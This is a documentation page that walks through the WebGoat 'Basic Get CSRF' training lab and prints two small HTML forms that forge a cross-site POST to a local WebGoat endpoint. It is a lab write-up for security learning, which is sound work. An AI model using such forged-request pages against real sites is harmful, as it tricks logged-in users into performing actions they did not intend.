A10:2021 | Server Side Request Forgery | Cross Site Request Forgery (3) | Cycubix Docs
Basic Get CSRF Exercise
Trigger the form below from an external source while logged in. The response will include a ‘flag’ (a numeric value).

Confirm Flag
Confirm the flag you should have gotten on the previous page below.

Solution
With VS Code and HTML
- Hints: The form has hidden inputs. You will need to use an external page and/or script to trigger it. Try creating a local page or one that is uploaded and points to this form as its action. The trigger can be manual or scripted to happen automatically.
- If we click the Submit button, we see a message saying that the request is coming from the form itself.

- If we open the developer tools, we can see the inputs the form has.

- To create your own fake page, open Visual Studio Code and create an HTML file with the following code:
```html
<html>
<body>
<script>history.pushState('', '', '/');</script>
<form action="http://localhost:8080/WebGoat/csrf/basic-get-flag" method="POST">
<input type="hidden" name="csrf" value="false" />
<input type="hidden" name="submit" value="Submit" />
<input type="submit" value="Submit" />
</form>
</body>
</html>
```
- Save the file as fakepage.html. Go to WebWolf and upload the file. You will see that the file opens in a new tab showing the Submit button. Once you click it, you will see a JSON message with the flag number: copy and paste the flag number into WebGoat's lesson.
With Engagement Tools on BurpSuite
- There is a tool (Pro version only, under Engagement tools > Generate CSRF PoC) that creates an HTML page based on the captured POST request.
```html
<form accept-charset="UNKNOWN" id="basic-csrf-get" method="POST" name="form1" target="_blank" action="http://127.0.0.1:8080/WebGoat/csrf/basic-get-flag">
<input name="csrf" type="hidden" value="false">
<input type="submit" name="submit">
</form>
```